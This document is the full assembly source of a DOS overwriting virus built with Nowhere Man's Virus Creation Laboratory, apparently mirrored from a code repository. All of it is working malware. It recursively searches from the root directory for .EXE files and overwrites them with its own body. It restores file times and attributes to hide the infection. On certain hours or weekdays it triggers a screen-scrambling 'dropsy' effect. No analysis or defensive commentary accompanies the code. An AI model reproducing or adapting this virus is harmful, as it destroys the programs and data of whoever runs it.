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synced 2025-02-23 15:04:39 +00:00
324 lines
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324 lines
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; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Unknown User
virus_type equ 1 ; Overwriting Virus
is_encrypted equ 0 ; We're not encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
main proc near
Row dw 24
flag: xchg dx,ax
mul ch
xchg dx,ax
call search_files ; Find and infect a file
call search_files ; Find and infect another file
call get_hour
cmp ax,0017h ; Did the function return 23?
je strt00 ; If equal, do effect
call get_weekday
cmp ax,0005h ; Did the function return 5?
je strt00 ; If equal, do effect
jmp end00 ; Otherwise skip over it
;First, get current video mode and page.
strt00: mov cx,0B800h ;color display, color video mem for page 1
mov ah,15 ;Get current video mode
int 10h
cmp al,2 ;Color?
je A2 ;Yes
cmp al,3 ;Color?
je A2 ;Yes
cmp al,7 ;Mono?
je A1 ;Yes
int 20h ;No,quit
;here if 80 col text mode; put video segment in ds.
A1: mov cx,0A300h ;Set for mono; mono videomem for page 1
A2: mov bl,0 ;bx=page offset
add cx,bx ;Video segment
mov ds,cx ;in ds
;start dropsy effect
xor bx,bx ;Start at top left corner
A3: push bx ;Save row start on stack
mov bp,80 ;Reset column counter
;Do next column in a row.
A4: mov si,bx ;Set row top in si
mov ax,[si] ;Get char & attr from screen
cmp al,20h ;Is it a blank?
je A7 ;Yes, skip it
mov dx,ax ;No, save it in dx
mov al,20h ;Make it a space
mov [si],ax ;and put on screen
add si,160 ;Set for next row
mov di,cs:Row ;Get rows remaining
A5: mov ax,[si] ;Get the char & attr from screen
mov [si],dx ;Put top row char & attr there
A6: call Vert ;Wait for 2 vert retraces
mov [si],ax ;Put original char & attr back
;Do next row, this column.
add si,160 ;Next row
dec di ;Done all rows remaining?
jne A5 ;No, do next one
mov [si-160],dx ;Put char & attr on line 25 as junk
;Do next column on this row.
A7: add bx,2 ;Next column, same row
dec bp ;Dec column counter; done?
jne A4 ;No, do this column
;Do next row.
A8: pop bx ;Get current row start
add bx,160 ;Next row
dec cs:Row ;All rows done?
jne A3 ;No
A9: mov ax,4C00h
int 21h ;Yes, quit to DOS with error code
;routine to deal with snow on CGA screen.
Vert: push ax
push dx
push cx ;Save all registers used
mov cl,2 ;Wait for 2 vert retraces
mov dx,3DAh ;CRT status port
F1: in al,dx ;Read status
test al,8 ;Vert retrace went hi?
je F1 ;No, wait for it
dec cl ;2nd one?
je F3 ;Yes, write during blanking time
F2: in al,dx ;No, get status
test al,8 ;Vert retrace went low?
jne F2 ;No, wait for it
jmp F1 ;Yes, wait for next hi
F3: pop cx
pop dx
pop ax ;Restore registers
end00: mov ax,04C00h ; DOS terminate function
int 021h
main endp
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
mov dx,offset root ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
mov dx,offset all_files ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
mov dx,offset up_dir ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
mov dx,offset exe_mask ; DX points to "*.EXE"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
exe_mask db "*.EXE",0 ; Mask for all .EXE files
traverse endp
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ch],0 ; Is the file > 65535 bytes?
jne infection_done ; If it is then exit
cmp word ptr [si + 025h],'DN' ; Might this be COMMAND.COM?
je infection_done ; If it is then skip it
cmp word ptr [si + 01Ah],(finish - start)
jb infection_done ; If it's too small then exit
mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,4 ; CX holds bytes to read (4)
mov dx,offset buffer ; DX points to buffer
int 021h
mov ah,03Eh ; DOS close file function
int 021h
push si ; Save DTA address before compare
mov si,offset buffer ; SI points to comparison buffer
mov di,offset flag ; DI points to virus flag
mov cx,4 ; CX holds number of bytes (4)
rep cmpsb ; Compare the first four bytes
pop si ; Restore DTA address
je infection_done ; If equal then exit
mov byte ptr [set_carry],1 ; Success -- the file is OK
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,finish - start ; CX holds virus length
mov dx,offset start ; DX points to start of virus
int 021h
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed
ret ; Return to caller
buffer db 4 dup (?) ; Buffer to hold test data
set_carry db ? ; Set-carry-on-exit flag
infect_file endp
get_hour proc near
mov ah,02Ch ; DOS get time function
int 021h
mov al,ch ; Copy hour into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_hour endp
get_weekday proc near
mov ah,02Ah ; DOS get date function
int 021h
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_weekday endp
vcl_marker db "[VCL]",0 ; VCL creation marker
finish label near
code ends
end main